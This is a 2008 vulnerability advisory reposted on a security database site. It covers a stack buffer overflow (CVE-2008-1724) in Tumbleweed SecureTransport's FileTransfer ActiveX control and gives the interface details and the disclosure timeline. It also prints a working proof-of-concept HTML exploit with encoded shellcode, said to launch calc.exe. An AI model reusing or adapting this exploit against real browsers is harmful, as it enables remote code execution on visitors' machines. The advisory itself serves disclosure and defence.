SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

Tumbleweed SecureTransport FileTransfer ActiveX Control Buffer Overflow


Arrow  SecurityAlert : 3806
Arrow  CVE : CVE-2008-1724
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Given : Yes
Arrow  Credit : Patrick Webster
Arrow  Published : 11.04.2008

Arrow  Affected Software : Tumbleweed SecureTransport FileTransfer



Arrow  Advisory Text :  

aushack.com - Vulnerability Advisory
-----------------------------------------------
Release Date:
07-Apr-2008

Software:
Tumbleweed Communications - SecureTransport FileTransfer
http://www.tumbleweed.com/

Description:
"Tumbleweed SecureTransport is the industry's most secure Managed File
Transfer
solution for moving financial transactions, critical business files,
large
documents, XML, and EDI transactions over the Internet and private
IP networks.
The SecureTransport managed file transfer suite was built with
security in mind
from the ground up. SecureTransport provides corporate and
government organizations
with an enterprise-class managed file transfer service supporting a
broad and flexible
set of open Internet standards. Winner of the 2006 "Best Intellectual
Property
Protection" award from SC Magazine, SecureTransport securely manages
file transfer
at over 20,000 sites around the world.

Financial networks use SecureTransport to move billions of dollars
in financial
transactions daily, and 8 of the top 10 U.S. banks use it to serve
tens of thousands
of corporate customers. Healthcare providers, payers, producers and
clearing houses
are linked through SecureTransport, which provides a single,
integrated secure file
transfer infrastructure for transferring private health information
(PHI). And
government agencies leverage SecureTransport to share sensitive
documents
with other agencies."

Versions affected:
SecureTransport FileTransfer ActiveX Control vcst_eu.dll 1.0.0.5 English.
Prior versions, and other language editions (vcst_*.dll), are assumed
to be vulnerable.

Vulnerability discovered:

Buffer Overflow.

Vulnerability impact:

High - Remote code execution.

Vulnerability information:

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable
installations of Tumbleweed Communications SecureTransport
FileTransfer ActiveX Control.
User interaction is required to exploit this vulnerability in that
the target must visit a
malicious page. It may be possible to embed into HTML capable email
clients.

The specific flaw exists within the ActiveX control:

DLL: vcst_en.dll
CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3

interface IActiveXTransfer : IDispatch {
[id(0x00000007), helpstring("method TransferFile")]
HRESULT TransferFile(
[in] VARIANT URL,
[in] VARIANT hostName,
[in] VARIANT localFile,
[in] VARIANT remoteFile,
[in] VARIANT fdxCookie,
[in] long isSecure,
[in] long isUpload,
[in] int portNo,
[in] long isAscii,
[in] long shouldPerformMD5,
[in] long isCheckpointRestart,
[in] int serverPing,
[out, retval] VARIANT* errBuffer);
};

When a large value is specified for the 'remoteFile' parameter of the
IActiveXTransfer.FileTransfer() method, a stack overflow occurs.
Exploitation can result
in code execution under the context of the current user. Other
parameters, such as localFile,
fdxCookie and localFile may also vulnerable.

Examples:

The following HTML will execute calc.exe under Windows 2000 Professional.

<html>
<object classid="CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3"
id="Vulnerable"></object>
<script language="javascript">
Vulnerable.TransferFile("a", "b", "c",
"HqwToZjIhHkOZrLAyrUXkIEJkcQkiYRtePnECVUqpnlzkJTgBuGiqyLUCnceJkrsIxPXchp
kjFjIgJRqGvniwwHJssGiTaPpmKZlBPwGMYhShxUWMCLuhgrpWXfdoWCCRYtDTrwyvDmfdAt
dazeizBqexoCGifFzEKzvLENkrNCoqpQVtclDmpzPIJZTgUuSHWyiZoUWeNzrJFILdoEpKoy
EptrZidLYuGbCrHxrMURRpdXyYJLzbeGRKqUOliWDHFdTEJOsGLngqOVVZdjzlCgOYbvSaUK
cmQcugvmVQWMQVfudlFmPvrmULKPQDVGuVFxuhFbuazTlsGbYhuJIjKfPdzGdYKcGVmVFqrt
RrzXIGrauMEauSvNfDQkfyQNOTNSwftDyRhKdBFyZHaKQDDrxIEoFyrNLjLPTTGTYNlkoWfP
dgSqStnopGaGkwCujLqtocvbYJuTVbUJUJbsloqLClPXTklqPEOsthiraZgJzElMuXPuleJC
QdcLsEbnalOGUpZsLgafPsjJEjUuIKAwjZWAaMLnVZwqMQeUYToFMBuneclybwZcKUjHMZhU
aEayTKAqPlXGIcUbJVXOpiergIyJVEegVBsPObCFGjXBCgEYZYWfUKxzvVzWeJvhqDRksWeZ
TWBRhMctQqFMuRHxuTifCqZUsVbILkcJNPUnbnsQHvxdmXMQdpHYTCiDBSwJUxmhKHRbYISv
VGvburwysfdxiBPsDiHJJpBYnQpWdBQBwTrikbgybejtrQlBScWNsdHUxsaJpbKeamEbyjgA
BESztoNphFXKFclPKGFfrDhBdQkPSxApusHVXwumGCVrfgNUDmOaGOAtHkoPzfDLAvtNaXPH
WLaKCCUQAYdaAxALDrEcLZwGCXkOcgLVsSrJHAWMtpeAnplUkYhTizmWNyribnFjJAtCxHSJ
sjAAiPbMTsmAVCioiIdvUVzEWpVJDfHQKGUAmmYqGUCfTXPyhkjcSyhBHOddRPvqWugerPbM
MQlSllqNPquoytLBtvWbRyzAJddSxtzQaLATtYgibQzPeaMQzKIdpEJHPWSZyAkyaGkQJxCj
gcrwQkBygMCsddYUdHifpbYdPgASxsPDjaTsArCJqosrCvrwHDKkUKjSaoJtbTaiJreoGjDW
fDafPjrStaCeUQCVwiyvafEIcsbSvlCavYTHKSnyraoIuUcsWPSpCVHbWEYtwobKFQwvUjoC
ZqdZEFoQzvosazdPVjXhYqdnDpPTSRapMmAuFXsixOKucVKZZKOBSnAPEzsBcWMGBnNRUVff
kJSzESkzkgyKWHkQXIIVjWCeCqMXZtGtGRafPCRyQkZYjRpQOHisWHfdtOSyZHJapOYBLQpR
MDyNrhnmFeZWWaWpcuMkfEnZPBbLJwCQloArgGKvsudOoLNFfJwaWZzvSUGKFaddKnMIpuWw
XtLzGKmkCJrDZkohkHrbmZZVhFGLhAgLMbwNVPixPcBefTvfNJimVtYGXYPgHChbZLSgPwSY
zlqCIpzOMBVSjGzgksrmKjAjlDRIhBBmELmUDMFSqHwWpxfEEWwjzObyFXZVGOMrrWqsWADb
tweGtddyFNAIpqQqRzxmVUbjAbUxnDndqpKNDbWKpIHGAQuoGcufpEkjrbMecXBzSsKentBw
SHkNDbPBkiZEvnQEKtFgIKCKDDBMsnxFLBKgyTYEIkZdLjxBpuWUHRmrAqeLZGrSYcHlmhEs
DbctsVoimbXEJryOLpibDVzoGaxfuhjyDvcNWhvSfixmuJUlNWoeEJVpSVupoCcTCLteLmgl
sHXIWOUXEWZURFNjdmnaxJPAAPaKtbTQkqyjqbgLsEZtZUQTbqXCzkpnCeKGbBvjiXJgnAbH
GbowIAVKXRgcJXtkZLRuClxmJtSPfeIWyOUvaUGnXBQFJfbKwofltQJYldfKXbShFcfwumMW
SgIOmiTzGofVNEuGOnkFnnzjKLJVXwAkxonTCeINNwkIDgoVZmjfnflgvWUToyMkVSuGAQhz
DLSoeGtKuPHoPynBsdrVqPJcNksGiJmZWYsMZWoRIWsBTBwaSfOQlBjzmwqrGXdDBEeKSuwS
ncGcwJyOnlCpOkXWcrBdfTncQfwLYfQPPWmlrLMPUZiOMcoxUmOSJbVzqbKlmgIjQcPABepT
GFchsrdWijXbYxfLkIMxoTDRjfkRiytIvzFAfWuXfHrEVXoAuVZEDPqiTemWciTsSmKbwEtf
MXkIVpDxKlFxRJHdaMdUrEZCJNkATqMnWcbAAEWPDNeWaPtGArUDpDPNkemRFZiEFLVqxaMd
ZnWFvFtUrXYWnPjWNMdTuzsMFxnmMEtwVQEcaZHzIWvGfaNHKTgKroefyErvhZqAavhGLJFd
IzbjnVXkJlfFEeWmfoTRFIYNtfIvIbjZNSsGMzjvZMYvfGwQDzmDdCLHDEMdkYdCluEwIXBG
ugcOmrVhhTqhcJeWofypbnAvXsHNKwqDrWWWKYePeXkpInurLBiCAtqtVqiYOIzPUzNZcmEU
yOaIWetBzEUpovdlaSXRFtJSHkXsLKglMsqETAcHvJZWcGEeelObuqCdWaYqPhfghqGfnYpE
rsUIVSZQbiRpJNdoeHLXEFeqXBoMpnZTaJZchqHpkdocMEvdOEnhOzzueuOTwXrwEATaDaWJ
pXZuLsCrYczknwyAphmUevgvZzQGOQzyrsPvIZZUGXqSwgRADPhvcfBMAGYmPGDDXPnEoOzA
BADlDQGicETRIAmcRwsSvszWELcaseVabXOmGuBhpfOjhALMypkyCgyBDpFEwbnGYSXFiNqb
OqUypiJiTrOthTyspQvMQawnagaFJWzgoxKWQpoHXFxRUWRcmtLHFLPakRPDxNiGliWQqtRB
jKHnBAagKkuMQLLVuDLevjbkEhqGFFYylybFEyMvdnMaRdcucYrpaSNGesjkOYWczjffbJmh
EWTgeYGPDKRHBuOmauGzNNKCXhOAOqhxdHQAdfQEffPDBrvGiEodtTDIXeDdsOXcmMrdMJdx
nbZFiuVRFNioshyrXTVodBxaFXYBbwfVwcUSJXGdZZAnYMEhVtPEZYUUBeRJDZKFCrRuJQdL
tkKakwFLEQXTcOUcjFPolJLWtJvXenczUxRbGZRINYXWUzzcHJNryYMOCHNZsrfloSffZWtg
LJXudLeRYwbukvxEMcMwXAYiXChqgVXDeXDMvfowmLZSwkHjTLtIRFnmGFArnVllqfjiOnXP
dZjaIxugozJjVcoVZnExzQxhxPrciIeSjJMBImjHfsHyoigqknpsAoNGpGqRSEVegZQXQlVQ
yNmewfOjiZCwTWOdSRCwnzQczqnWyeXTIzzukwVKkDAsStGbrCwYYFQqnlBheQVFhGfgwKSC
cQSqixNGSPeVobgJLiNftjLqycVBbSUphUqoxxstwQUdAVkQfyoKUAKWgEJycUHyHRPoVbnT
TVHvrGnwzlPAvDsThykmjHmaWLblFsSPlHrsBJTvHWAmJViArtMgJZaTbPARfcnHAlorGuby
ovlnCfyQArosOILFrXKHupmHusRIoQgDZzyZHsCZhNoOnHWnUsUGFeqYsLILkSwnvHsuOlYG
jhIfMhwqmcaIMQaqFFkhABUEXzKyKYSQyOTyrFfqIlIkNvLxriALuQsbamSphbypAADfqgXj
xtFKzlXCuuCovaozBjtrqjyRqEJTLoLWXSJUzayhZYomKFzYBfKYzGodrrIXemRZZRwDXyfC
LVxmmdLOvwSCTjtsETodToQLvjrUkHUQktaQZvODJrtRgmEuFYDvPIcmynnHzAVroXUfFIvU
szIyeJVaWogcLPDKuLTPmCWZEOWpyQeDUjhiyZHtjMEBnGYjYpnFeiAlaqfziytMiSAUmXpK
zJEdIPWNdMKsjilgDITudqqCoHrsQDGUBIbxtHCJRzPIQuthMmhiaJSvncBzVNuDDIJFXvyS
SKUOlkFdEbbvvQYMRoFgGurkUAWbiczranFEsZzPYlUJKsAeFJOXPVmthxTdmgQWCzscNuhC
NfRnOZFXwUOdGmHGhBijSrytzjNJiwDyNNlYmQbrjSSPvDgOdEGZNbKEkhyoboqmlzQUvEhr
SrEAuKduQGvOyrVgCvrhmzXQjHsoQrkRMIgFNhqvMncLHcauYYPVcZNescGfqSPeFODxhzUk
alkFRrMpnptBHYTZXVEgINvieNxFeJIVYRJaEsJOwDEkXaUxvuHQgUSjyVxoXfxjzNTXehTu
keQAosgTtbaTswUhSSxGmytLAxAUYmLpcNOWqvHWgiJhfduWtwALnUZoiGZIlKhbnHZmGLWj
fgMDLbNJKNJAJufWHQDDdBNZsXXiFzgADlSniUqBjVQBNmCEDuciGDgnpNqXRGfdrPfMeFBs
UHvwPYNfguoTgJoAUVCsfsXKXqbUOVaTbvWzaLFIiBodrzFvgzkejRwlBvdoDjvRUegEepep
XqzHopUAAzvHgnacEwmXoZkmYmxKNJFoxekgijRWXRJteBBqwpPSrUVlSiHHPqBvipxhCaLQ
lumwzvoFnQNHKzYnAFWcjqfsLzjjbIEBzRyMvTVSdQSoYhHzOUXgUERmDofuFOqzngpykPjh
MpQElnoUzqwzH&#195;&#171;
!&#195;?&#195;?*
uTX&#195;&#157;&#195;?&#195;?p&#195;´]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2
BB0BBABXP8ABuJIKLJHQTE
PC0C0LKG5GLLKCLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJD
MEQHBJKJTGKPTGTC4CEKULKQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP
1L6E0F6E4LKQVFPLKG0DLLKBPELNMLKCXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJ
GBCCQBLBCEPAA",
"d", false, false, 80, false, true, true, 420)
</script>
</html>

Additionally, a Metasploit Framework Module has been written to
demonstrate the vulnerability.

References:
aushack.com advisory
http://www.aushack.com/200708-tumbleweed.txt

Credit:
Patrick Webster ( patrick (at) aushack (dot) com [email concealed] )

Disclosure timeline:
13-Aug-2007 - Discovered during quick audit.
14-Aug-2007 - Metasploit module developed.
22-Aug-2007 - Notified vendor.
19-Oct-2007 - Vendor patch released. SecureTransport Server 4.6.1 Hotfix
20.
07-Apr-2008 - Disclosure.

EOF





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...
Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication
PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file
Copyright © SecurityReason.com. All Rights Reserved.